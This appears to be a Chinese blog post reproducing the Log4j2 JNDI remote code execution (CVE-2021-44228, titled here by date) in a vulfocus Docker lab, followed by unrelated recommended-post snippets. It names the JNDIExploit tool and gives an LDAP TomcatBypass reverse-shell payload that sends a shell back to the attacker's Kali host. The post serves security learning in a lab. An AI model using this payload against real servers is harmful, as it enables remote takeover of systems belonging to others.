【Log4j2远程命令执行复现CVE-2021-12-09】

2023-05-16

目录

一、前言  

二、漏洞环境构建

三、复现过程


一、前言  

  Log4j2是基于log4j这个java日志处理组件进行二次开发和改进而来的。也是目前最常用的日志框架之一,在之前的博客中(http://t.csdn.cn/z9um4)我们阐述了漏洞的原理和大致的利用方法。今天就借助dockers拉取vulfocus上的漏洞环境进行漏洞的复现和利用的介绍。2.x <= log4j <= 2.15.0-rc1。

二、漏洞环境构建

docker搜索对应的漏洞环境,拉取对应的漏洞环境:

docker search vulfocus/log4j2-rce-2021-12-09
docker pull vulfocus/log4j2-rce-2021-12-09

docker中启动镜像,注意这里使用的web容器是tomcat,因此对应的端口映射方面,内网端口需为8080:

docker run -it -p 8080:8080 vulfocus/log4j2-rce-2021-12-09

三、复现过程

burp抓包:对应的payload 参数可控,

这里使用JNDI注入工具:JNDIExploit-1.4-SNAPSHOT.jar该工具集合了常见的java-web容器利用技巧,hub地址:https://github.com/WhiteHSBG/JNDIExploit

查看工具帮助:

 常见用法:

启动rmi服务器:

这里使用tomcat 中的shell反弹payload:

ldap://0.0.0.0:1389/TomcatBypass/ReverseShell/[ip]/[port]

 经过url编码后,重放:

 成功将shell反弹回kali中:

 

 

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

【Log4j2远程命令执行复现CVE-2021-12-09】 的相关文章

随机推荐

  • 51单片机、外部中断的使用(使用外部中断对LED灯进行操作,当按键按下灯亮、再次按下灯熄灭)

    在上一节 xff0c 我们介绍了中断系统的结构框图 我们知道了怎么配置外部中断 根据原理图P32管脚连接外部中断INT0 xff0c 且独立按键K3也连接P32管脚 xff0c 独立按键的另一端接GND xff0c 而P3管脚默认就是高电平
  • Ubuntu配置zsh、oh-my-zsh、prezto,配置环境变量

    Ubuntu配置zsh oh my zsh prezto xff0c 配置环境变量 1 Ubuntu配置zsh 1 1 为什么我们在Ubuntu上配置zsh替代bash xff1f 不想了解的读者可直接跳过 学过操作系统的读者可能知道 xf
  • Python爬虫lxml实训:使用lxml库爬取以下数据:游戏名称、游戏类型、游戏图片地址、文件大小、游戏热度

    题目要求 爬取数据的链接 https down gamersky com pc 爬取内容 游戏名称 游戏类型 游戏图片地址 文件大小 游戏热度将爬取内容写入文件 解题思路 导入所需要的第三方库 from lxml import etree
  • 2022-3-19(洛谷)

    阶乘数码 xff08 高精乘 xff09 题目描述 求 n 中某个数码出现的次数 输入格式 第一行为 t t 10 xff0c 表示数据组数 接下来 t 行 xff0c 每行一个正整数 n n 1000 和数码 a 输出格式 对于每组数据
  • Ubuntu系统配置网络(图文教程)

    打开vmware中虚拟机菜单中的虚拟机选项卡 在后续选项卡中选择设置选项 随着上一步步骤 xff0c 接下来选择硬件选项卡中的网络适配器选项 下一步我们在右边网络连接模式中的 xff0c 这里我们选择桥接模式 xff0c 虚拟机提供了三种了
  • Java暴力匹配算法——字符串匹配问题

    目录 暴力匹配算法 一 解析 二 图解 三 代码演示 四 输出结果 五 优化 有一个字符串 str1 61 34 BCDABCDABABCDABCABCD 34 xff0c 和一个字符串 str2 61 34 ABCAB 34 现在要判断
  • [PTA]兔子繁衍问题(java)

    一对兔子 xff0c 从出生后第3个月起每个月都生一对兔子 小兔子长到第3个月后每个月又生一对兔子 假如兔子都不死 xff0c 请问第1个月出生的一对兔子 xff0c 至少需要繁衍到第几个月时兔子总数才可以达到N对 xff1f packag
  • 用Java实现水仙花数的打印

    题目要求 xff1a 打印出1 10000范围内的所有的 水仙花数 xff0c 所谓 水仙花数 是指由一个3位数 xff0c 其各位数字立方和等于该数本身 例如 xff0c 153是一个 水仙花数 xff0c 因为153 61 1 3 43
  • 【如何学习网安(浅谈)】

    相信各位小伙伴一定听所过各种黑客的流弊操作 xff0c 键盘声满天飞 呵呵 xff0c 在下也曾幻想过有朝一日能够向当初中国红客一样 xff0c 攻陷漂亮国的白宫网站 将台湾是中国的一部分几个大字狠狠的挂在上面 然而在下不才 xff0c 还
  • 【Linux 主机ssh远程连接暴力破解详解】

    昨天 xff0c 安全老师布置了一个安全的小作业 xff0c 在下想了想 xff0c 做什么好呢 xff1f 最近学了很多 那就做一个Linux主机远程连接的暴力破解密码的作业 一 前期信息搜集 kali 作为黑客主机 xff0c cent
  • Linux-内网穿透frp-linux

    内网穿透frp linux 0 需求1 下载软件配置2 配置sever端 xff08 转接vps服务器 xff09 3 配置client端 xff08 校内Ubuntu电脑或校内网台式机 xff09 4 出现的问题参考 0 需求 想要在校外
  • GeoServer 服务器间同步 自动同步两个geoserver 基于JMS的集群

    教程 根据 https geoserver geo solutions it educational en clustering index html 来安装配置 教程中的GeoServer Active Clustering扩展下载地址过
  • 【Redhat-自动化运维工具ansible的安装和配置】

    ansible是一款自动化运维工具 xff0c 基于Python开发 xff0c 集合了众多运维工具 xff08 puppet cfengine chef func fabric xff09 的优点 xff0c 实现了批量系统配置 批量程序
  • 【Nmap的使用方法】

    目录 一 下载地址 二 功能概括 三 基本的语法规则 四 功能分步详解 1 主机发现 2 端口发现 3 应用程序与版本信息侦测 4 操作系统侦测 5 规避FW ID技术 一 下载地址 nmap官网地址 二 功能概括 基本功能 xff1a 主
  • 【Cobalt strike 渗透测试神器】

    目录 一 前言 安装包下载 主机详情 二 部分模块和Payload介绍 三 基本使用步骤 1 服务端和客户端 2 设置监听 四 配合其他工具反弹shell 1 kali中使用msf 2 CS创建监听 3 metasploit使用exploi
  • 【XSS攻击介绍(一)】

    目录 一 前言 二 攻击条件和漏洞验证方法 三 XSS漏洞分类 四 利用方法 五 XSS payload变形 六 防护总结 一 前言 XSS xff1a 跨站脚本攻击 xff0c 即CSS 利用网页开发时留下的漏洞 xff08 web应用程
  • 【vulnhub靶场之DC2靶机渗透】

    目录 一 前言 二 渗透过程 一 前言 大家好 xff0c 又到了快乐的学习时光了 xff0c 最近也是沉迷于DC系列的靶场 xff0c 每一次成功拿下靶场后都会学习和总结到很多的东西 今天的受害者是DC 2靶场 xff0c 话不多说 xf
  • 【文件上传漏洞绕过方式】

    目录 前言 正文 总结 前言 目前 xff0c 文件上传往往在业务中不可避免 xff0c 也是极其容易出现上传漏洞 根据owasptop10中的排名 xff0c 文件上传漏洞 xff08 属于攻击检测和防范不足 xff09 高居其中 今天和
  • 【AWVS破解安装学习】

    目录 前言 安装 破解 功能界面 总结 前言 Acunetix Web Vulnerability Scanner xff08 AWVS xff09 是用于测试和管理Web应用程序安全性的平台 xff0c 现如今是BS架构 能够自动扫描互联
  • 【Log4j2远程命令执行复现CVE-2021-12-09】

    目录 一 前言 二 漏洞环境构建 三 复现过程 一 前言 Log4j2是基于log4j这个java日志处理组件进行二次开发和改进而来的 也是目前最常用的日志框架之一 xff0c 在之前的博客中 xff08 http t csdn cn z9